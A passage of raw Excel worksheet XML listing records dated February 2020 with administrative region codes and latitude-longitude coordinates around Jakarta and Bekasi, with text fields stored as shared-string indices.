        <v>-616876</v>
      </c>
      <c r="X966" t="s">
        <v>19142</v>
      </c>
      <c r="Y966" t="str">
        <f t="shared" si="15"/>
        <v>-6.16876,106.90118</v>
      </c>
    </row>
    <row r="967" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A967">
        <v>108537</v>
      </c>
      <c r="B967" s="1">
        <v>43884</v>
      </c>
      <c r="C967">
        <v>0</v>
      </c>
      <c r="D967" t="s">
        <v>22</v>
      </c>
      <c r="E967" t="s">
        <v>23</v>
      </c>
      <c r="F967" t="s">
        <v>3714</v>
      </c>
      <c r="G967" t="s">
        <v>3715</v>
      </c>
      <c r="H967" t="s">
        <v>26</v>
      </c>
      <c r="I967" t="s">
        <v>3716</v>
      </c>
      <c r="J967" t="s">
        <v>2627</v>
      </c>
      <c r="L967" t="s">
        <v>3717</v>
      </c>
      <c r="M967">
        <v>3275061004</v>
      </c>
      <c r="N967">
        <v>3275061</v>
      </c>
      <c r="O967">
        <v>3275</v>
      </c>
      <c r="P967">
        <v>32</v>
      </c>
      <c r="Q967" t="s">
        <v>39</v>
      </c>
      <c r="R967" t="s">
        <v>40</v>
      </c>
      <c r="S967" t="s">
        <v>41</v>
      </c>
      <c r="T967" t="s">
        <v>42</v>
      </c>
      <c r="U967" s="5">
        <v>10698080</v>
      </c>
      <c r="V967" s="5" t="s">
        <v>15351</v>
      </c>
      <c r="W967" s="5">
        <v>-617951</v>
      </c>
      <c r="X967" t="s">
        <v>19143</v>
      </c>
      <c r="Y967" t="str">
        <f t="shared" si="15"/>
        <v>-6.17951,106.98080</v>
      </c>
    </row>
    <row r="968" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A968">
        <v>108538</v>
      </c>
      <c r="B968" s="1">
        <v>43884</v>
      </c>
      <c r="C968">
        <v>0</v>
      </c>
      <c r="D968" t="s">
        <v>22</v>
      </c>
      <c r="E968" t="s">
        <v>23</v>
      </c>
      <c r="F968" t="s">
        <v>3718</v>
      </c>
      <c r="G968" t="s">
        <v>3719</v>
      </c>
      <c r="H968" t="s">
        <v>26</v>
      </c>
      <c r="I968" t="s">
        <v>1758</v>
      </c>
      <c r="J968" t="s">
        <v>1010</v>
      </c>
      <c r="L968" t="s">
        <v>3720</v>
      </c>
      <c r="M968">
        <v>3175050002</v>
      </c>
      <c r="N968">
        <v>3175050</v>
      </c>
      <c r="O968">
        <v>3175</v>
      </c>
      <c r="P968">
        <v>31</v>
      </c>
      <c r="Q968" t="s">
        <v>1012</v>
      </c>
      <c r="R968" t="s">
        <v>1013</v>
      </c>
      <c r="S968" t="s">
        <v>547</v>
      </c>
      <c r="T968" t="s">
        <v>33</v>
      </c>
      <c r="U968" s="5">
        <v>10690590</v>
      </c>
      <c r="V968" s="5" t="s">
        <v>15352</v>
      </c>
      <c r="W968" s="5">
        <v>-616927</v>
      </c>
      <c r="X968" t="s">
        <v>19144</v>
      </c>
      <c r="Y968" t="str">
        <f t="shared" si="15"/>
        <v>-6.16927,106.90590</v>
      </c>
    </row>
    <row r="969" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A969">
        <v>108539</v>
      </c>
      <c r="B969" s="1">
        <v>43884</v>
      </c>
      <c r="C969">
        <v>0</v>
      </c>
      <c r="D969" t="s">
        <v>22</v>
      </c>
      <c r="E969" t="s">
        <v>23</v>
      </c>
      <c r="F969" t="s">
        <v>3721</v>
      </c>
      <c r="H969" t="s">
        <v>26</v>
      </c>
      <c r="I969" t="s">
        <v>166</v>
      </c>
      <c r="J969" t="s">
        <v>3072</v>
      </c>
      <c r="L969" t="s">
        <v>3722</v>
      </c>
      <c r="M969">
        <v>3172080003</v>
      </c>
      <c r="N969">
        <v>3172080</v>
      </c>
      <c r="O969">
        <v>3172</v>
      </c>
      <c r="P969">
        <v>31</v>
      </c>
      <c r="Q969" t="s">
        <v>2250</v>
      </c>
      <c r="R969" t="s">
        <v>141</v>
      </c>
      <c r="S969" t="s">
        <v>49</v>
      </c>
      <c r="T969" t="s">
        <v>33</v>
      </c>
      <c r="U969" s="5">
        <v>10694779</v>
      </c>
      <c r="V969" s="5" t="s">
        <v>15353</v>
      </c>
      <c r="W969" s="5">
        <v>-619843</v>
      </c>
      <c r="X969" t="s">
        <v>19145</v>
      </c>
      <c r="Y969" t="str">
        <f t="shared" si="15"/>
        <v>-6.19843,106.94779</v>
      </c>
    </row>
    <row r="970" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A970">
        <v>108540</v>
      </c>
      <c r="B970" s="1">
        <v>43884</v>
      </c>
      <c r="C970">
        <v>0</v>
      </c>
      <c r="D970" t="s">
        <v>22</v>
      </c>
      <c r="E970" t="s">
        <v>23</v>
      </c>
      <c r="F970" t="s">
        <v>3723</v>
      </c>
      <c r="G970" t="s">
        <v>3724</v>
      </c>
      <c r="H970" t="s">
        <v>26</v>
      </c>
      <c r="I970" t="s">
        <v>3668</v>
      </c>
      <c r="J970" t="s">
        <v>1100</v>
      </c>
      <c r="L970" t="s">
        <v>3725</v>
      </c>
      <c r="M970">
        <v>3172090007</v>
      </c>
      <c r="N970">
        <v>3172090</v>
      </c>
      <c r="O970">
        <v>3172</v>
      </c>
      <c r="P970">
        <v>31</v>
      </c>
      <c r="Q970" t="s">
        <v>890</v>
      </c>
      <c r="R970" t="s">
        <v>890</v>
      </c>
      <c r="S970" t="s">
        <v>49</v>
      </c>
      <c r="T970" t="s">
        <v>33</v>
      </c>
      <c r="U970" s="5">
        <v>10689394</v>
      </c>
      <c r="V970" s="5" t="s">
        <v>15354</v>
      </c>
      <c r="W970" s="5">
        <v>-617698</v>
      </c>
      <c r="X970" t="s">
        <v>19146</v>
      </c>
      <c r="Y970" t="str">
        <f t="shared" si="15"/>
        <v>-6.17698,106.89394</v>
      </c>
    </row>
    <row r="971" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A971">
        <v>108541</v>
      </c>
      <c r="B971" s="1">
        <v>43884</v>
      </c>
      <c r="C971">
        <v>0</v>
      </c>
      <c r="D971" t="s">
        <v>22</v>
      </c>
      <c r="E971" t="s">
        <v>23</v>
      </c>
      <c r="F971" t="s">
        <v>3726</v>
      </c>
      <c r="G971" t="s">
        <v>3727</v>
      </c>
      <c r="H971" t="s">
        <v>26</v>
      </c>
      <c r="I971" t="s">
        <v>111</v>
      </c>
      <c r="J971" t="s">
        <v>3664</v>
      </c>
      <c r="L971" t="s">
        <v>3728</v>
      </c>
      <c r="M971">
        <v>3172080003</v>
      </c>
      <c r="N971">
        <v>3172080</v>
      </c>
      <c r="O971">
        <v>3172</v>
      </c>
      <c r="P971">
        <v>31</v>
      </c>
      <c r="Q971" t="s">
        <v>2250</v>
      </c>
      <c r="R971" t="s">
        <v>141</v>
      </c>
      <c r="S971" t="s">
        <v>49</v>
      </c>
      <c r="T971" t="s">
        <v>33</v>
      </c>
      <c r="U971" s="5">
        <v>10694058</v>
      </c>
      <c r="V971" s="5" t="s">
        <v>15355</v>
      </c>
      <c r="W971" s="5">
        <v>-619453</v>
      </c>
      <c r="X971" t="s">
        <v>19147</v>
      </c>
      <c r="Y971" t="str">
        <f t="shared" si="15"/>
        <v>-6.19453,106.94058</v>
      </c>
    </row>
    <row r="972" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A972">
        <v>108542</v>
      </c>
      <c r="B972" s="1">
        <v>43884</v>
      </c>
      <c r="C972">
        <v>0</v>
      </c>
      <c r="D972" t="s">
        <v>22</v>
      </c>
      <c r="E972" t="s">
        <v>23</v>
      </c>
      <c r="F972" t="s">
        <v>3729</v>
      </c>
      <c r="G972" t="s">
        <v>3730</v>
      </c>
      <c r="H972" t="s">
        <v>26</v>
      </c>
      <c r="I972" t="s">
        <v>3731</v>
      </c>
      <c r="J972" t="s">
        <v>1590</v>
      </c>
      <c r="L972" t="s">
        <v>3732</v>
      </c>
      <c r="M972">
        <v>3175030002</v>
      </c>
      <c r="N972">
        <v>3175030</v>
      </c>
      <c r="O972">
        <v>3175</v>
      </c>
      <c r="P972">
        <v>31</v>
      </c>
      <c r="Q972" t="s">
        <v>1592</v>
      </c>
      <c r="R972" t="s">
        <v>1563</v>
      </c>
      <c r="S972" t="s">
        <v>547</v>
      </c>
      <c r="T972" t="s">
        <v>33</v>
      </c>
      <c r="U972" s="5">
        <v>10688496</v>
      </c>
      <c r="V972" s="5" t="s">
        <v>15356</v>
      </c>
      <c r="W972" s="5">
        <v>-615657</v>
      </c>
      <c r="X972" t="s">
        <v>19148</v>
      </c>
      <c r="Y972" t="str">
        <f t="shared" si="15"/>
        <v>-6.15657,106.88496</v>
      </c>
    </row>
    <row r="973" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A973">
        <v>108543</v>
      </c>
      <c r="B973" s="1">
        <v>43884</v>
      </c>
      <c r="C973">
        <v>0</v>
      </c>
      <c r="D973" t="s">
        <v>22</v>
      </c>
      <c r="E973" t="s">
        <v>23</v>
      </c>
      <c r="F973" t="s">
        <v>3733</v>
      </c>
      <c r="G973" t="s">
        <v>3734</v>
      </c>
      <c r="H973" t="s">
        <v>26</v>
      </c>
      <c r="I973" t="s">
        <v>166</v>
      </c>
      <c r="J973" t="s">
        <v>2356</v>
      </c>
      <c r="L973" t="s">
        <v>3735</v>
      </c>
      <c r="M973">
        <v>3173050002</v>
      </c>
      <c r="N973">
        <v>3173050</v>
      </c>
      <c r="O973">
        <v>3173</v>
      </c>
      <c r="P973">
        <v>31</v>
      </c>
      <c r="Q973" t="s">
        <v>588</v>
      </c>
      <c r="R973" t="s">
        <v>589</v>
      </c>
      <c r="S973" t="s">
        <v>62</v>
      </c>
      <c r="T973" t="s">
        <v>33</v>
      </c>
      <c r="U973" s="5">
        <v>10686923</v>
      </c>
      <c r="V973" s="5" t="s">
        <v>15357</v>
      </c>
      <c r="W973" s="5">
        <v>-616982</v>
      </c>
      <c r="X973" t="s">
        <v>19149</v>
      </c>
      <c r="Y973" t="str">
        <f t="shared" si="15"/>
        <v>-6.16982,106.86923</v>
      </c>
    </row>
    <row r="974" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A974">
        <v>108544</v>
      </c>
      <c r="B974" s="1">
        <v>43884</v>
      </c>
      <c r="C974">
        <v>0</v>
      </c>
      <c r="D974" t="s">
        <v>22</v>
      </c>
      <c r="E974" t="s">
        <v>23</v>
      </c>
      <c r="F974" t="s">
        <v>3736</v>
      </c>
      <c r="G974" t="s">
        <v>3737</v>
      </c>
      <c r="H974" t="s">
        <v>26</v>
      </c>
      <c r="I974" t="s">
        <v>1651</v>
      </c>
      <c r="J974" t="s">
        <v>3738</v>
      </c>
      <c r="L974" t="s">
        <v>3739</v>
      </c>
      <c r="M974">
        <v>3172100005</v>
      </c>
      <c r="N974">
        <v>3172100</v>
      </c>
      <c r="O974">
        <v>3172</v>
      </c>
      <c r="P974">
        <v>31</v>
      </c>
      <c r="Q974" t="s">
        <v>1773</v>
      </c>
      <c r="R974" t="s">
        <v>1436</v>
      </c>
      <c r="S974" t="s">
        <v>49</v>
      </c>
      <c r="T974" t="s">
        <v>33</v>
      </c>
      <c r="U974" s="5">
        <v>10686907</v>
      </c>
      <c r="V974" s="5" t="s">
        <v>15358</v>
      </c>
      <c r="W974" s="5">
        <v>-620699</v>
      </c>
      <c r="X974" t="s">
        <v>19150</v>
      </c>
      <c r="Y974" t="str">
        <f t="shared" si="15"/>
        <v>-6.20699,106.86907</v>
      </c>
    </row>
    <row r="975" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A975">
        <v>108545</v>
      </c>
      <c r="B975" s="1">
        <v>43884</v>
      </c>
      <c r="C975">
        <v>0</v>
      </c>
      <c r="D975" t="s">
        <v>22</v>
      </c>
      <c r="E975" t="s">
        <v>23</v>
      </c>
      <c r="F975" t="s">
        <v>3740</v>
      </c>
      <c r="G975" t="s">
        <v>3741</v>
      </c>
      <c r="H975" t="s">
        <v>26</v>
      </c>
      <c r="I975" t="s">
        <v>523</v>
      </c>
      <c r="J975" t="s">
        <v>3742</v>
      </c>
      <c r="L975" t="s">
        <v>3743</v>
      </c>
      <c r="M975">
        <v>3172020005</v>
      </c>
      <c r="N975">
        <v>3172020</v>
      </c>
      <c r="O975">
        <v>3172</v>
      </c>
      <c r="P975">
        <v>31</v>
      </c>
      <c r="Q975" t="s">
        <v>3744</v>
      </c>
      <c r="R975" t="s">
        <v>1644</v>
      </c>
      <c r="S975" t="s">
        <v>49</v>
      </c>
      <c r="T975" t="s">
        <v>33</v>
      </c>
      <c r="U975" s="5">
        <v>10687273</v>
      </c>
      <c r="V975" s="5" t="s">
        <v>15359</v>
      </c>
      <c r="W975" s="5">
        <v>-629354</v>
      </c>
      <c r="X975" t="s">
        <v>19151</v>
      </c>
      <c r="Y975" t="str">
        <f t="shared" si="15"/>
        <v>-6.29354,106.87273</v>
      </c>
    </row>
    <row r="976" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A976">
        <v>108546</v>
      </c>
      <c r="B976" s="1">
        <v>43884</v>
      </c>
      <c r="C976">
        <v>0</v>
      </c>
      <c r="D976" t="s">
        <v>22</v>
      </c>
      <c r="E976" t="s">
        <v>23</v>
      </c>
      <c r="F976" t="s">
        <v>3745</v>
      </c>
      <c r="G976" t="s">
        <v>3746</v>
      </c>
      <c r="H976" t="s">
        <v>26</v>
      </c>
      <c r="I976" t="s">
        <v>2196</v>
      </c>
      <c r="J976" t="s">
        <v>2407</v>
      </c>
      <c r="L976" t="s">
        <v>3747</v>
      </c>
      <c r="M976">
        <v>3175060006</v>
      </c>
      <c r="N976">
        <v>3175060</v>
      </c>
      <c r="O976">
        <v>3175</v>
      </c>
      <c r="P976">
        <v>31</v>
      </c>
      <c r="Q976" t="s">
        <v>2409</v>
      </c>
      <c r="R976" t="s">
        <v>2279</v>
      </c>
      <c r="S976" t="s">
        <v>547</v>
      </c>
      <c r="T976" t="s">
        <v>33</v>
      </c>
      <c r="U976" s="5">
        <v>10692384</v>
      </c>
      <c r="V976" s="5" t="s">
        <v>15360</v>
      </c>
      <c r="W976" s="5">
        <v>-613110</v>
      </c>
      <c r="X976" t="s">
        <v>19152</v>
      </c>
      <c r="Y976" t="str">
        <f t="shared" si="15"/>
        <v>-6.13110,106.92384</v>
      </c>
    </row>
    <row r="977" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A977">
        <v>108547</v>
      </c>
      <c r="B977" s="1">
        <v>43884</v>
      </c>
      <c r="C977">
        <v>0</v>
      </c>
      <c r="D977" t="s">
        <v>22</v>
      </c>
      <c r="E977" t="s">
        <v>23</v>
      </c>
      <c r="F977" t="s">
        <v>3748</v>
      </c>
      <c r="G977" t="s">
        <v>3749</v>
      </c>
      <c r="H977" t="s">
        <v>26</v>
      </c>
      <c r="I977" t="s">
        <v>166</v>
      </c>
      <c r="J977" t="s">
        <v>3750</v>
      </c>
      <c r="L977" t="s">
        <v>3556</v>
      </c>
      <c r="M977">
        <v>3175050002</v>
      </c>
      <c r="N977">
        <v>3175050</v>
      </c>
      <c r="O977">
        <v>3175</v>
      </c>
      <c r="P977">
        <v>31</v>
      </c>
      <c r="Q977" t="s">
        <v>1012</v>
      </c>
      <c r="R977" t="s">
        <v>1013</v>
      </c>
      <c r="S977" t="s">
        <v>547</v>
      </c>
      <c r="T977" t="s">
        <v>33</v>
      </c>
      <c r="U977" s="5">
        <v>10689961</v>
      </c>
      <c r="V977" s="5" t="s">
        <v>15361</v>
      </c>
      <c r="W977" s="5">
        <v>-617640</v>
      </c>
      <c r="X977" t="s">
        <v>19153</v>
      </c>
      <c r="Y977" t="str">
        <f t="shared" si="15"/>
        <v>-6.17640,106.89961</v>
      </c>
    </row>
    <row r="978" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A978">
        <v>108548</v>
      </c>
      <c r="B978" s="1">
        <v>43884</v>
      </c>
      <c r="C978">
        <v>0</v>
      </c>
      <c r="D978" t="s">
        <v>22</v>
      </c>
      <c r="E978" t="s">
        <v>23</v>
      </c>
      <c r="F978" t="s">
        <v>3751</v>
      </c>
      <c r="G978" t="s">
        <v>3752</v>
      </c>
      <c r="H978" t="s">
        <v>26</v>
      </c>
      <c r="I978" t="s">
        <v>628</v>
      </c>
      <c r="J978" t="s">
        <v>2627</v>
      </c>
      <c r="M978">
        <v>3216100002</v>
      </c>
      <c r="N978">
        <v>3216100</v>
      </c>
      <c r="O978">
        <v>3216</v>
      </c>
      <c r="P978">
        <v>32</v>
      </c>
      <c r="Q978" t="s">
        <v>3193</v>
      </c>
      <c r="R978" t="s">
        <v>940</v>
      </c>
      <c r="S978" t="s">
        <v>41</v>
      </c>
      <c r="T978" t="s">
        <v>42</v>
      </c>
      <c r="U978" s="5">
        <v>10700643</v>
      </c>
      <c r="V978" s="5" t="s">
        <v>15362</v>
      </c>
      <c r="W978" s="5">
        <v>-616660</v>
      </c>
      <c r="X978" t="s">
        <v>19154</v>
      </c>
      <c r="Y978" t="str">
        <f t="shared" si="15"/>
        <v>-6.16660,107.00643</v>
      </c>
    </row>
    <row r="979" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A979">
        <v>108549</v>
      </c>
      <c r="B979" s="1">
        <v>43884</v>
      </c>
      <c r="C979">
        <v>0</v>
      </c>
      <c r="D979" t="s">
        <v>22</v>
      </c>
      <c r="E979" t="s">
        <v>23</v>
      </c>
      <c r="F979" t="s">
        <v>3753</v>
      </c>
      <c r="G979" t="s">
        <v>3754</v>
      </c>
      <c r="H979" t="s">
        <v>26</v>
      </c>
      <c r="I979" t="s">
        <v>1538</v>
      </c>
      <c r="J979" t="s">
        <v>2916</v>
      </c>
      <c r="L979" t="s">
        <v>3755</v>
      </c>
      <c r="M979">
        <v>3172040003</v>
      </c>
      <c r="N979">
        <v>3172040</v>
      </c>
      <c r="O979">
        <v>3172</v>
      </c>
      <c r="P979">
        <v>31</v>
      </c>
      <c r="Q979" t="s">
        <v>552</v>
      </c>
      <c r="R979" t="s">
        <v>281</v>
      </c>
      <c r="S979" t="s">
        <v>49</v>
      </c>
      <c r="T979" t="s">
        <v>33</v>
      </c>
      <c r="U979" s="5">
        <v>10688243</v>
      </c>
      <c r="V979" s="5" t="s">
        <v>15363</v>
      </c>
      <c r="W979" s="5">
        <v>-626346</v>
      </c>
      <c r="X979" t="s">
        <v>19155</v>
      </c>
      <c r="Y979" t="str">
        <f t="shared" si="15"/>
        <v>-6.26346,106.88243</v>
      </c>
    </row>
    <row r="980" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A980">
        <v>108550</v>
      </c>
      <c r="B980" s="1">
        <v>43884</v>
      </c>
      <c r="C980">
        <v>0</v>
      </c>
      <c r="D980" t="s">
        <v>22</v>
      </c>
      <c r="E980" t="s">
        <v>23</v>
      </c>
      <c r="F980" t="s">
        <v>3756</v>
      </c>
      <c r="G980" t="s">
        <v>3757</v>
      </c>
      <c r="H980" t="s">
        <v>26</v>
      </c>
      <c r="I980" t="s">
        <v>72</v>
      </c>
      <c r="J980" t="s">
        <v>2276</v>
      </c>
      <c r="M980">
        <v>3175060001</v>
      </c>
      <c r="N980">
        <v>3175060</v>
      </c>
      <c r="O980">
        <v>3175</v>
      </c>
      <c r="P980">
        <v>31</v>
      </c>
      <c r="Q980" t="s">
        <v>2278</v>
      </c>
      <c r="R980" t="s">
        <v>2279</v>
      </c>
      <c r="S980" t="s">
        <v>547</v>
      </c>
      <c r="T980" t="s">
        <v>33</v>
      </c>
      <c r="U980" s="5">
        <v>10692469</v>
      </c>
      <c r="V980" s="5" t="s">
        <v>15364</v>
      </c>
      <c r="W980" s="5">
        <v>-615967</v>
      </c>
      <c r="X980" t="s">
        <v>19156</v>
      </c>
      <c r="Y980" t="str">
        <f t="shared" si="15"/>
        <v>-6.15967,106.92469</v>
      </c>
    </row>
    <row r="981" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A981">
        <v>108551</v>
      </c>
      <c r="B981" s="1">
        <v>43884</v>
      </c>
      <c r="C981">
        <v>0</v>
      </c>
      <c r="D981" t="s">
        <v>22</v>
      </c>
      <c r="E981" t="s">
        <v>23</v>
      </c>
      <c r="F981" t="s">
        <v>3758</v>
      </c>
      <c r="G981" t="s">
        <v>3759</v>
      </c>
      <c r="H981" t="s">
        <v>26</v>
      </c>
      <c r="I981" t="s">
        <v>1991</v>
      </c>
      <c r="J981" t="s">
        <v>3760</v>
      </c>
      <c r="L981" t="s">
        <v>3761</v>
      </c>
      <c r="M981">
        <v>3172070002</v>
      </c>
      <c r="N981">
        <v>3172070</v>
      </c>
      <c r="O981">
        <v>3172</v>
      </c>
      <c r="P981">
        <v>31</v>
      </c>
      <c r="Q981" t="s">
        <v>128</v>
      </c>
      <c r="R981" t="s">
        <v>128</v>
      </c>
      <c r="S981" t="s">
        <v>49</v>
      </c>
      <c r="T981" t="s">
        <v>33</v>
      </c>
      <c r="U981" s="5">
        <v>10692099</v>
      </c>
      <c r="V981" s="5" t="s">
        <v>15365</v>
      </c>
      <c r="W981" s="5">
        <v>-622977</v>
      </c>
      <c r="X981" t="s">
        <v>19157</v>
      </c>
      <c r="Y981" t="str">
        <f t="shared" si="15"/>
        <v>-6.22977,106.92099</v>
      </c>
    </row>
    <row r="982" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A982">
        <v>108552</v>
      </c>
      <c r="B982" s="1">
        <v>43884</v>
      </c>
      <c r="C982">
        <v>0</v>
      </c>
      <c r="D982" t="s">
        <v>22</v>
      </c>
      <c r="E982" t="s">
        <v>23</v>
      </c>
      <c r="F982" t="s">
        <v>3762</v>
      </c>
      <c r="G982" t="s">
        <v>3763</v>
      </c>
      <c r="H982" t="s">
        <v>26</v>
      </c>
      <c r="I982" t="s">
        <v>383</v>
      </c>
      <c r="J982" t="s">
        <v>278</v>
      </c>
      <c r="L982" t="s">
        <v>3764</v>
      </c>
      <c r="M982">
        <v>3172040004</v>
      </c>
      <c r="N982">
        <v>3172040</v>
      </c>
      <c r="O982">
        <v>3172</v>
      </c>
      <c r="P982">
        <v>31</v>
      </c>
      <c r="Q982" t="s">
        <v>280</v>
      </c>
      <c r="R982" t="s">
        <v>281</v>
      </c>
      <c r="S982" t="s">
        <v>49</v>
      </c>
      <c r="T982" t="s">
        <v>33</v>
      </c>
      <c r="U982" s="5">
        <v>10687845</v>
      </c>
      <c r="V982" s="5" t="s">
        <v>15366</v>
      </c>
      <c r="W982" s="5">
        <v>-626741</v>
      </c>
      <c r="X982" t="s">
        <v>19158</v>
      </c>
      <c r="Y982" t="str">
        <f t="shared" si="15"/>
        <v>-6.26741,106.87845</v>
      </c>
    </row>
    <row r="983" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A983">
        <v>108553</v>
      </c>
      <c r="B983" s="1">
        <v>43884</v>
      </c>
      <c r="C983">
        <v>0</v>
      </c>
      <c r="D983" t="s">
        <v>22</v>
      </c>
      <c r="E983" t="s">
        <v>23</v>
      </c>
      <c r="F983" t="s">
        <v>3765</v>
      </c>
      <c r="H983" t="s">
        <v>26</v>
      </c>
      <c r="I983" t="s">
        <v>435</v>
      </c>
      <c r="J983" t="s">
        <v>2438</v>
      </c>
      <c r="L983" t="s">
        <v>3766</v>
      </c>
      <c r="M983">
        <v>3175050003</v>
      </c>
      <c r="N983">
        <v>3175050</v>
      </c>
      <c r="O983">
        <v>3175</v>
      </c>
      <c r="P983">
        <v>31</v>
      </c>
      <c r="Q983" t="s">
        <v>1740</v>
      </c>
      <c r="R983" t="s">
        <v>1013</v>
      </c>
      <c r="S983" t="s">
        <v>547</v>
      </c>
      <c r="T983" t="s">
        <v>33</v>
      </c>
      <c r="U983" s="5">
        <v>10691045</v>
      </c>
      <c r="V983" s="5" t="s">
        <v>15367</v>
      </c>
      <c r="W983" s="5">
        <v>-614702</v>
      </c>
      <c r="X983" t="s">
        <v>19159</v>
      </c>
      <c r="Y983" t="str">
        <f t="shared" si="15"/>
        <v>-6.14702,106.91045</v>
      </c>
    </row>
    <row r="984" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A984">
        <v>108554</v>
      </c>
      <c r="B984" s="1">
        <v>43884</v>
      </c>
      <c r="C984">
        <v>0</v>
      </c>
      <c r="D984" t="s">
        <v>22</v>
      </c>
      <c r="E984" t="s">
        <v>23</v>
      </c>
      <c r="F984" t="s">
        <v>3767</v>
      </c>
      <c r="G984" t="s">
        <v>3768</v>
      </c>
      <c r="H984" t="s">
        <v>26</v>
      </c>
      <c r="I984" t="s">
        <v>1099</v>
      </c>
      <c r="J984" t="s">
        <v>3769</v>
      </c>
      <c r="M984">
        <v>3172090001</v>
      </c>
      <c r="N984">
        <v>3172090</v>
      </c>
      <c r="O984">
        <v>3172</v>
      </c>
      <c r="P984">
        <v>31</v>
      </c>
      <c r="Q984" t="s">
        <v>2681</v>
      </c>
      <c r="R984" t="s">
        <v>890</v>
      </c>
      <c r="S984" t="s">
        <v>49</v>
      </c>
      <c r="T984" t="s">
        <v>33</v>
      </c>
      <c r="U984" s="5">
        <v>10687659</v>
      </c>
      <c r="V984" s="5" t="s">
        <v>15368</v>
      </c>
      <c r="W984" s="5">
        <v>-620421</v>
      </c>
      <c r="X984" t="s">
        <v>19160</v>
      </c>
      <c r="Y984" t="str">
        <f t="shared" si="15"/>
        <v>-6.20421,106.87659</v>
      </c>
    </row>
    <row r="985" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A985">
        <v>108555</v>
      </c>
      <c r="B985" s="1">
        <v>43884</v>
      </c>
      <c r="C985">
        <v>0</v>
      </c>
      <c r="D985" t="s">
        <v>22</v>
      </c>
      <c r="E985" t="s">
        <v>23</v>
      </c>
      <c r="F985" t="s">
        <v>3770</v>
      </c>
      <c r="H985" t="s">
        <v>26</v>
      </c>
      <c r="I985" t="s">
        <v>27</v>
      </c>
      <c r="J985" t="s">
        <v>3771</v>
      </c>
      <c r="L985" t="s">
        <v>3772</v>
      </c>
      <c r="M985">
        <v>3173060003</v>
      </c>
      <c r="N985">
        <v>3173060</v>
      </c>
      <c r="O985">
        <v>3173</v>
      </c>
      <c r="P985">
        <v>31</v>
      </c>
      <c r="Q985" t="s">
        <v>3773</v>
      </c>
      <c r="R985" t="s">
        <v>61</v>
      </c>
      <c r="S985" t="s">
        <v>62</v>
      </c>
      <c r="T985" t="s">
        <v>33</v>
      </c>
      <c r="U985" s="5">
        <v>10687131</v>
      </c>
      <c r="V985" s="5" t="s">
        <v>15369</v>
      </c>
      <c r="W985" s="5">
        <v>-616756</v>
      </c>
      <c r="X985" t="s">
        <v>18696</v>
      </c>
      <c r="Y985" t="str">
        <f t="shared" si="15"/>
        <v>-6.16756,106.87131</v>
      </c>
    </row>
    <row r="986" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A986">
        <v>108556</v>
      </c>
      <c r="B986" s="1">
        <v>43884</v>
      </c>
      <c r="C986">
        <v>0</v>
      </c>
      <c r="D986" t="s">
        <v>22</v>
      </c>
      <c r="E986" t="s">
        <v>23</v>
      </c>
      <c r="F986" t="s">
        <v>3774</v>
      </c>
      <c r="H986" t="s">
        <v>26</v>
      </c>
      <c r="I986" t="s">
        <v>523</v>
      </c>
      <c r="J986" t="s">
        <v>2180</v>
      </c>
      <c r="L986" t="s">
        <v>3775</v>
      </c>
      <c r="M986">
        <v>3172080005</v>
      </c>
      <c r="N986">
        <v>3172080</v>
      </c>
      <c r="O986">
        <v>3172</v>
      </c>
      <c r="P986">
        <v>31</v>
      </c>
      <c r="Q986" t="s">
        <v>140</v>
      </c>
      <c r="R986" t="s">
        <v>141</v>
      </c>
      <c r="S986" t="s">
        <v>49</v>
      </c>
      <c r="T986" t="s">
        <v>33</v>
      </c>
      <c r="U986" s="5">
        <v>10695949</v>
      </c>
      <c r="V986" s="5" t="s">
        <v>15370</v>
      </c>
      <c r="W986" s="5">
        <v>-616028</v>
      </c>
      <c r="X986" t="s">
        <v>19161</v>
      </c>
      <c r="Y986" t="str">
        <f t="shared" si="15"/>
        <v>-6.16028,106.95949</v>
      </c>
    </row>
    <row r="987" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A987">
        <v>108557</v>
      </c>
      <c r="B987" s="1">
        <v>43884</v>
      </c>
      <c r="C987">
        <v>0</v>
      </c>
      <c r="D987" t="s">
        <v>85</v>
      </c>
      <c r="E987" t="s">
        <v>23</v>
      </c>
      <c r="F987" t="s">
        <v>3776</v>
      </c>
      <c r="G987" t="s">
        <v>3777</v>
      </c>
      <c r="H987" t="s">
        <v>26</v>
      </c>
      <c r="I987" t="s">
        <v>103</v>
      </c>
      <c r="J987" t="s">
        <v>3559</v>
      </c>
      <c r="K987" t="s">
        <v>3778</v>
      </c>
      <c r="L987" t="s">
        <v>3779</v>
      </c>
      <c r="M987">
        <v>3175060001</v>
      </c>
      <c r="N987">
        <v>3175060</v>
      </c>
      <c r="O987">
        <v>3175</v>
      </c>
      <c r="P987">
        <v>31</v>
      </c>
      <c r="Q987" t="s">
        <v>2278</v>
      </c>
      <c r="R987" t="s">
        <v>2279</v>
      </c>
      <c r="S987" t="s">
        <v>547</v>
      </c>
      <c r="T987" t="s">
        <v>33</v>
      </c>
      <c r="U987" s="5">
        <v>10692408</v>
      </c>
      <c r="V987" s="5" t="s">
        <v>15371</v>
      </c>
      <c r="W987" s="5">
        <v>-615509</v>
      </c>
      <c r="X987" t="s">
        <v>19162</v>
      </c>
      <c r="Y987" t="str">
        <f t="shared" si="15"/>
        <v>-6.15509,106.92408</v>
      </c>
    </row>
    <row r="988" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A988">
        <v>108558</v>
      </c>
      <c r="B988" s="1">
        <v>43884</v>
      </c>
      <c r="C988">
        <v>0</v>
      </c>
      <c r="D988" t="s">
        <v>22</v>
      </c>
      <c r="E988" t="s">
        <v>23</v>
      </c>
      <c r="F988" t="s">
        <v>3780</v>
      </c>
